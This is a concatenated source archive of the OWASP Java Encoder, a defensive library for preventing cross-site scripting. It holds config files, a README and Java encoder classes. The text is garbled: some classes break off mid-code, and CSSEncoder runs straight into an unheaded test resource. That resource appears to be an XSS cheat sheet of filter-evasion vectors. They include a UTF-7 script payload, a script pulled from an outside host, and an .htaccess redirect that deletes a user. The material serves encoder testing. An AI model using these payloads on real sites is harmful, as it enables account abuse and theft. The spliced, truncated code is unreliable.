owasp-java-encoder-1.2.3/.gitignore

*/target/**
/target/**

# Intellij project files
*.iml
*.ipr
*.iws
.idea/

# Eclipse project files
.classpath
.project
.settings
maven-eclipse.xml
.externalToolBuilders

# Netbeans configuration
nb-configuration.xml
*/nbproject/*

owasp-java-encoder-1.2.3/.travis.yml

language: java
dist: trusty
jdk:
  - openjdk8
  - oraclejdk8
# to compile using JDK 9+ we must move from source and target 1.5 to 1.6
#  - openjdk9
#  - openjdk10
#  - openjdk11
#  - oraclejdk9
#  - oraclejdk10
script: mvn test -B -X

owasp-java-encoder-1.2.3/LICENSE

Copyright (c) 2015 Jeff Ichnowski
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:

    * Redistributions of source code must retain the above
      copyright notice, this list of conditions and the following
      disclaimer.

    * Redistributions in binary form must reproduce the above
      copyright notice, this list of conditions and the following
      disclaimer in the documentation and/or other materials
      provided with the distribution.

    * Neither the name of the OWASP nor the names of its
      contributors may be used to endorse or promote products
      derived from this software without specific prior written
      permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
OF THE POSSIBILITY OF SUCH DAMAGE.

owasp-java-encoder-1.2.3/META-INF/MANIFEST.MF

Manifest-Version: 1.0
Bnd-LastModified: 1533328833261
Bundle-ManifestVersion: 2
Bundle-Name: org.owasp.encoder
Bundle-SymbolicName: org.owasp.encoder
Bundle-Version: 1.2.1
Created-By: 1.8.0_181 (Oracle Corporation)
Export-Package: org.owasp.encoder
Tool: Bnd-1.50.0

owasp-java-encoder-1.2.3/README.md

OWASP Java Encoder Project
==========================

[![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=master)](https://travis-ci.org/OWASP/owasp-java-encoder)
[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause)

Contextual Output Encoding is a computer programming technique necessary to stop Cross-Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance encoder class with little baggage.

Start using the OWASP Java Encoders
-----------------------------------

You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22).

JSP tags and EL functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2/encoder-jsp-1.2.jar).

The jars are also available in Maven:

```xml
<dependency>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder</artifactId>
    <version>1.2.2</version>
</dependency>

<dependency>
    <groupId>org.owasp.encoder</groupId>
    <artifactId>encoder-jsp</artifactId>
    <version>1.2.2</version>
</dependency>
```

Quick Overview
--------------

The OWASP Java Encoder library is intended for quick contextual encoding with very little overhead, either in performance or usage. To get started, simply add the encoder-1.2.jar, import org.owasp.encoder.Encode and start using.

Example usage:

```java
PrintWriter out = ....;
out.println("");
```

Please look at the javadoc for Encode to see the variety of contexts for which you can encode.

Happy Encoding!

News
----

### 2020-11-08 - 1.2.3 Release

The team is happy to announce that version 1.2.3 has been released!

* Update to make the manifest OSGi-compliant (#39).
* Update to support ESAPI 2.2 and later (#37).

### 2018-09-14 - 1.2.2 Release

The team is happy to announce that version 1.2.2 has been released!

* This is a minor release fixing documentation and licensing issues.

### 2017-02-19 - 1.2.1 Release

The team is happy to announce that version 1.2.1 has been released!

* The CDATA Encoder was modified so that it does not emit intermediate characters between adjacent CDATA sections.
* The documentation on [gh-pages](http://owasp.github.io/owasp-java-encoder/) has been improved.

### 2015-04-12 - 1.2 Release on GitHub

OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released!

### 2014-03-31 - Documentation updated

Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use!

### 2014-01-30 - Version 1.1.1 released

We're happy to announce that version 1.1.1 has been released. Along with an important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder.

### 2013-02-14 - Version 1.1 released

We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library.

owasp-java-encoder-1.2.3/core/pom.xml

4.0.0 org.owasp.encoder encoder-parent 1.2.3 encoder jar Java Encoder The OWASP Encoders package is a collection of high-performance low-overhead contextual encoders, that when utilized correctly, is an effective tool in preventing Web Application security vulnerabilities such as Cross-Site Scripting. org.apache.maven.plugins maven-surefire-plugin org/owasp/encoder/BenchmarkTest.java benchmark org.apache.maven.plugins maven-failsafe-plugin -Xmx1024m -XX:MaxPermSize=256m org/owasp/encoder/BenchmarkTest.java integration-test verify

owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/ASCIIBits.java

// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.

package org.owasp.encoder;

/**
 * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs)
 * to be used testing lower-ASCII characters. It helps make some other code
 * easier to read. It is not intended to be public.
 */
class ASCIIBits {
    /** Lower 64 bits. */
    long _lowerMask;
    /** Upper 64 bits. */
    long _upperMask;

    /**
     * Sets a bit to 1 for each character in the argument string. No checking
     * is performed to see if characters are in the valid range 0..127.
     *
     * @param chars the characters to set to 1.
     * @return {@code this}
     */
    ASCIIBits set(String chars) {
        for (int i=0, n=chars.length() ; i

owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/CDATAEncoder.java

package org.owasp.encoder;

import java.nio.CharBuffer;
import java.nio.charset.CoderResult;

/**
 * ". This encoder removes invalid XML characters, and encodes
 * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is
 * maintained, but the code receiving the output will have to handle multiple
 * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to
 * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then
 * use this encoder to remove any invalid XML characters.
 *
 * @author Jeff Ichnowski
 */
class CDATAEncoder extends Encoder {
    /**
     * The encoding of {@code "]]>"}.
     */
    private static final char[] CDATA_END_ENCODED = "]]]]><![CDATA[>".toCharArray();

    /**
     * Length of {@code "]]]]><![CDATA[>"}.
     */
    private static final int CDATA_END_ENCODED_LENGTH = 15;

    /**
     * Length of {@code "]]>"}.
     */
    private static final int CDATA_END_LENGTH = 3;

    @Override
    protected int maxEncodedLength(int n) {
        // "]" becomes "]" (1 -> 1)
        // "]]" becomes "]]" (2 -> 2)
        // "]]>" becomes "]]]]><![CDATA[>" (3 -> 15)
        // "]]>]" becomes "]]]]><![CDATA[>]" (3 -> 15 + 1 -> 1)
        // ...
        int worstCase = n / CDATA_END_LENGTH;
        int remainder = n % CDATA_END_LENGTH;
        return worstCase * CDATA_END_ENCODED_LENGTH + remainder;
        // return (n - remainder) * 5 + remainder;
    }

    @Override
    protected int firstEncodedOffset(String input, int off, int len) {
        final int n = off + len;
        //int closeCount = 0; //unused...
        for (int i = off; i < n; ++i) {
            char ch = input.charAt(i);
            if (ch <= Unicode.MAX_ASCII) {
                if (ch != ']') {
                    if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') {
                        return i;
//                    } else {
//                        // valid
                    }
                } else if (i + 1 < n) {
                    if (input.charAt(i + 1) != ']') {
                        // "]x" (next character is safe for this to be ']')
                    } else {
                        // "]]?"
                        // keep looping through ']'
                        for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) {
                            // valid
                        }
                        // at this point we've looped through a sequence
                        // of 2 or more "]", if the next character is ">"
                        // we need to encode "]]>".
                        if (i + 2 < n) {
                            if (input.charAt(i + 2) == '>') {
                                return i;
//                            } else {
//                                // valid
                            }
                        } else {
                            return n;
                        }
                    }
                } else {
                    return n;
                }
            } else if (ch < Character.MIN_HIGH_SURROGATE) {
                if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) {
                    return i;
//                } else {
//                    // valid
                }
            } else if (ch <= Character.MAX_HIGH_SURROGATE) {
                if (i + 1 < n) {
                    if (Character.isLowSurrogate(input.charAt(i + 1))) {
                        int cp = Character.toCodePoint(ch, input.charAt(i + 1));
                        if (Unicode.isNonCharacter(cp)) {
                            return i;
                        } else {
                            ++i; // valid pair
                        }
                    } else {
                        return i;
                    }
                } else {
                    // end of input, high without low = invalid
                    return i;
                }
            } else if (// low surrogate without preceding high surrogate
                    ch <= Character.MAX_LOW_SURROGATE
                    // or non-characters
                    || ch > '\ufffd'
                    || ('\ufdd0' <= ch && ch <= '\ufdef')) {
                return i;
//            } else {
//                // valid
            }
        }
        return n;
    }

    @Override
    protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) {
        final char[] in = input.array();
        final char[] out = output.array();
        int i = input.arrayOffset() + input.position();
        final int n = input.arrayOffset() + input.limit();
        int j = output.arrayOffset() + output.position();
        final int m = output.arrayOffset() + output.limit();

        for (; i < n; ++i) {
            char ch = in[i];
            if (ch <= Unicode.MAX_ASCII) {
                if (ch != ']') {
                    if (j >= m) {
                        return overflow(input, i, output, j);
                    }
                    if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') {
                        out[j++] = ch;
                    } else {
                        out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
                    }
                } else if (i + 1 < n) {
                    if (in[i + 1] != ']') {
                        // "]x" (next character is safe for this to be ']')
                        if (j >= m) {
                            return overflow(input, i, output, j);
                        }
                        out[j++] = ']';
                    } else {
                        // "]]?"
                        // keep looping through ']'
                        for (; i + 2 < n && in[i + 2] == ']'; ++i) {
                            if (j >= m) {
                                return overflow(input, i, output, j);
                            }
                            out[j++] = ']';
                        }
                        // at this point we've looped through a sequence
                        // of 2 or more "]", if the next character is ">"
                        // we need to encode "]]>".
                        if (i + 2 < n) {
                            if (in[i + 2] == '>') {
                                if (j + CDATA_END_ENCODED_LENGTH > m) {
                                    return overflow(input, i, output, j);
                                }
                                System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH);
                                j += CDATA_END_ENCODED_LENGTH;
                                i += 2;
                            } else {
                                if (j >= m) {
                                    return overflow(input, i, output, j);
                                }
                                out[j++] = ']';
                            }
                        } else if (endOfInput) {
                            if (j + 2 > m) {
                                return overflow(input, i, output, j);
                            }
                            out[j++] = ']';
                            out[j++] = ']';
                            i = n;
                            break;
                        } else {
                            break;
                        }
                    }
                } else if (endOfInput) {
                    // seen "]", then end of input.
                    if (j >= m) {
                        return overflow(input, i, output, j);
                    }
                    out[j++] = ']';
                    i++;
                    break;
                } else {
                    break;
                }
            } else if (ch < Character.MIN_HIGH_SURROGATE) {
                if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) {
                    if (j >= m) {
                        return overflow(input, i, output, j);
                    }
                    out[j++] = ch;
                } else {
                    // C1 control code
                    if (j >= m) {
                        return overflow(input, i, output, j);
                    }
                    out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
                }
            } else if (ch <= Character.MAX_HIGH_SURROGATE) {
                if (i + 1 < n) {
                    if (Character.isLowSurrogate(in[i + 1])) {
                        int cp = Character.toCodePoint(ch, in[i + 1]);
                        if (Unicode.isNonCharacter(cp)) {
                            if (j >= m) {
                                return overflow(input, i, output, j);
                            }
                            out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
                            ++i;
                        } else {
                            if (j + 1 >= m) {
                                return overflow(input, i, output, j);
                            }
                            out[j++] = ch;
                            out[j++] = in[++i];
                        }
                    } else {
                        // high without low
                        if (j >= m) {
                            return overflow(input, i, output, j);
                        }
                        out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
                    }
                } else if (endOfInput) {
                    // end of input, high without low = invalid
                    if (j >= m) {
                        return overflow(input, i, output, j);
                    }
                    out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
                } else {
                    break;
                }
            } else if (// low surrogate without preceding high surrogate
                    ch <= Character.MAX_LOW_SURROGATE
                    // or non-characters
                    || ch > '\ufffd'
                    || ('\ufdd0' <= ch && ch <= '\ufdef')) {
                if (j >= m) {
                    return overflow(input, i, output, j);
                }
                out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT;
            } else {
                if (j >= m) {
                    return overflow(input, i, output, j);
                }
                out[j++] = ch;
            }
        }
        return underflow(input, i, output, j);
    }

    @Override
    public String toString() {
        return "CDATAEncoder";
    }
}

owasp-java-encoder-1.2.3/core/src/main/java/org/owasp/encoder/CSSEncoder.java

// Copyright (c) 2012 Jeff Ichnowski
// All rights reserved.
package org.owasp.encoder;

import java.nio.CharBuffer;
import java.nio.charset.CoderResult;

/**
 * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts.
 * Other contexts, such as color, number (w/unit), etc... are not good targets
 * for "encoding" (e.g. you cannot encode the string "XYZ" into a number),
 * they should instead be validated through other means (such as regular
 * expressions).
 */
class CSSEncoder extends Encoder {
    /** Number of bits in a {@code long}. */
    static final int LONG_BITS = 64;

    /** Length of hex encoding with trailing space {@code "\## "}. */
    static final int HEX_ENCODED_LENGTH = 4;

    /**
     * Encoding mode of operation--specifies the set of characters that
     * require encoding.
     */
    enum Mode {
        /**
         * String contexts. Characters between quotes.
         *
         * <pre>
         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
         *   Allows: "\\{nl}" (escaped newline)
         * </pre>
         */
        STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")),

        /**
         * URL context. Characters inside a "url(...)".
         *
         * <pre>
         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
         *   Escapes: \\[0-9a-f]{1,6}(\s?)
         *            \\[^\n\r\f0-9a-f]
         * </pre>
         */
        URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")),
        // In both contexts above '<' is added to protect embedded

tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

Remote style sheet part 3 . This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

Remote style sheet part 4 . This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites:

Local htc file . This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:

List-style-image . Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
  • XSS VBscript in an image: Mocha (older versions of Netscape only): Livescript US-ASCII encoding (found by Kurt Huwig ). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page: ¼script¾alert(¢XSS¢)¼/script¾ META (the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): META using data: directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go or to encode your own. You can also use the below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: META with additional URL parameter . If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann ): IFRAME (if iframes are allowed there are a lot of other XSS problems as well): FRAME (frames have the same sorts of XSS problems as iframes): TABLE (who would have thought tables were XSS targets... except me, of course): TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):
    DIV background-image
    DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
    DIV background-image plus extra characters . I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
    DIV expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
    STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov for this one): Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): exp/* STYLE tag (Older versions of Netscape only): STYLE tag using background-image STYLE tag using background Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added): Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo . 
If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one. Using ActionScript inside flash can obfuscate your XSS vector: a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); XML namespace . The htc file must be located on the same server as your XSS vector: XSS XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo: ]]> XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): <IMG SRC="javascript:alert('XSS')"> Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result HTML+TIME in XML . This is how Grey Magic hacked Hotmail and Yahoo! . This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector: SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: PHP - requires PHP to be installed on the server to use this XSS vector. 
Again, if you can run any scripts remotely like this, there are probably much more dire issues: alert("XSS")'); ?> IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser Cookie manipulation - admittidly this is pretty obscure but I have seen a few examples where UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to for this one). Click for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.: +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- XSS using HTML quote encapsulation: This was tested in IE, your mileage may vary. 
For performing XSS on sites that allow " For performing XSS on sites that allow " Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: PT SRC="http://ha.ckers.org/xss.js"> URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): IP verses hostname: XSS URL encoding: XSS Dword encoding (Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details): XSS Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): XSS Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): XSS Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: XSS Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". 
You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. XSS Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. XSS Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: XSS Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): XSS Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): XSS Extra dot for absolute DNS: XSS JavaScript link location: XSS Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). 
I actually used a similar attack vector against several separate real-world XSS filters by using the conversion filter itself to help create the attack vector (i.e. "java&#x09;script:" was converted into "java script:" with a literal tab between "java" and "script", which renders in IE, Netscape 8.1+ in secure site mode and Opera):
Character Encoding: all the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?):
< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Character Encoding Calculator (interactive form on the original page: ASCII text in; hex, URL, HTML with and without semicolons, decimal and base64 out).
IP Obfuscation Calculator (interactive form on the original page: IP address and dword level in; dword, hex and octal addresses out).
Browser support reference table:
Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.
Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.
Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed its security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option.
Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional.
Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.
Vector works in Opera.
Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional Vector works in older versions of Netscape 4.0 - untested. Note: if a vector is not marked it either does not work or it is untested. Written in vim, and UTF-8 encoded, for her pleasure. All rights reserved, all wrongs observed. © 1995-2008 owasp-java-encoder-1.2.3/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt000066400000000000000000004254511375203724500310350ustar00rootroot00000000000000"already\n started" "already\n started" "already started" "current" position "force-async" "parser-inserted" "ready to be parser-executed" <fragment> <host> <hostport> <meta name=""\n content=""> <path> <port> <query> <scheme> <script type=""> 5\n February 2004 W3C Patent Policy :active :checked :default :dir(ltr) :dir(rtl) :disabled :enabled :in-range :indeterminate :invalid :link :optional :out-of-range :read-only :read-write :required :valid :visited ERCIM MIT W3C Name application/x-www-form-urlencoded encoding\n algorithm application/x-www-form-urlencoded encoding\n algorithm data:\n URL data:\n URL data: URL form element\n pointer form element pointer head\n element pointer head element\n pointer head element pointer javascript:\n URL javascript: URL lang\n attribute in the XML namespace lang\n attributes in the XML namespace lang attribute\n in the XML namespace lang attribute in the\n XML namespace lang attribute in the XML\n namespace lang attributes in\n the XML namespace lang attributes in the\n XML namespace multipart/form-data boundary string multipart/form-data encoding\n algorithm multipart/form-data encoding\n algorithm text/plain encoding\n algorithm dropzone processing\n steps form element\n pointer form element pointer CDATASection nodes in the DOM are treated as\n equivalent to Text nodes MediaStream and\n PeerConnection events XMLHttpRequest form element\n pointer form element pointer head element hreflang\n attribute on a and area\n elements html element iframe srcdoc 
documents input type keyword javascript:\n URL javascript: URL in the\n Document parent browsing context W3C 1 Introduction 1.1 Background 1.10 Recommended reading 1.2 Audience 1.3 Scope 1.4 History 1.5 Design notes 1.5.1 Serializability of script execution 1.5.2 Compliance with other specifications 1.6 HTML vs XHTML 1.7 Structure of this specification 1.7.1 How to read this specification 1.7.2 Typographic conventions 1.8 A quick introduction to HTML 1.8.1 Writing secure applications with HTML 1.8.2 Common pitfalls to avoid when using the scripting APIs 1.9 Conformance requirements for authors 1.9.1 Presentational markup 1.9.2 Syntax errors 1.9.3 Restrictions on content models and on attribute values 10 Rendering 10.1 Introduction 10.2 The CSS user agent style sheet and presentational hints 10.3 Non-replaced elements 10.3.1 Hidden elements 10.3.10 The hr element 10.3.11 The fieldset element 10.3.2 The page 10.3.3 Flow content 10.3.4 Phrasing content 10.3.5 Bidirectional text 10.3.6 Sections and headings 10.3.7 Lists 10.3.8 Tables 10.3.9 Form controls 10.4 Replaced elements 10.4.1 Embedded content 10.4.2 Timed text tracks 10.4.2.1 WebVTT cue text rendering rules 10.4.2.2 Applying CSS properties to WebVTT Node Objects 10.4.2.3 CSS extensions 10.4.2.3.1 The '::cue' pseudo-element 10.4.2.3.2 The ':past' and ':future' pseudo-classes 10.4.3 Images 10.4.4 Attributes for embedded content and images 10.4.5 Image maps 10.4.6 Toolbars 10.5 Bindings 10.5.1 Introduction 10.5.10 The input element as a button 10.5.11 The marquee element 10.5.12 The meter element 10.5.13 The progress element 10.5.14 The select element 10.5.15 The textarea element 10.5.16 The keygen element 10.5.17 The time element 10.5.2 The button element 10.5.3 The details element 10.5.4 The input element as a text entry widget 10.5.5 The input element as domain-specific widgets 10.5.6 The input element as a range control 10.5.7 The input element as a color well 10.5.8 The input element as a checkbox and radio 
button widgets 10.5.9 The input element as a file upload control 10.6 Frames and framesets 10.7 Interactive media 10.7.1 Links, forms, and navigation 10.7.2 The title attribute 10.7.3 Editing hosts 10.7.4 Text rendered in native user interfaces 10.8 Print media 11 Obsolete features 11.1 Obsolete but conforming features 11.1.1 Warnings for obsolete but conforming features 11.2 Non-conforming features 11.3 Requirements for implementations 11.3.1 The applet element 11.3.2 The marquee element 11.3.3 Frames 11.3.4 Other elements, attributes and APIs 12 IANA considerations 12.1 text/html 12.2 multipart/x-mixed-replace 12.3 application/xhtml+xml 12.4 application/x-www-form-urlencoded 12.5 text/cache-manifest 12.6 web+ scheme prefix 2 Common infrastructure 2.1 Terminology 2.1.1 Resources 2.1.2 XML 2.1.3 DOM trees 2.1.4 Scripting 2.1.5 Plugins 2.1.6 Character encodings 2.2 Conformance requirements 2.2.1 Conformance classes 2.2.2 Dependencies 2.2.3 Extensibility 2.3 Case-sensitivity and string comparison 2.4 UTF-8 2.5 Common microsyntaxes 2.5.1 Common parser idioms 2.5.10 Media queries 2.5.2 Boolean attributes 2.5.3 Keywords and enumerated attributes 2.5.4 Numbers 2.5.4.1 Signed integers 2.5.4.2 Non-negative integers 2.5.4.3 Floating-point numbers 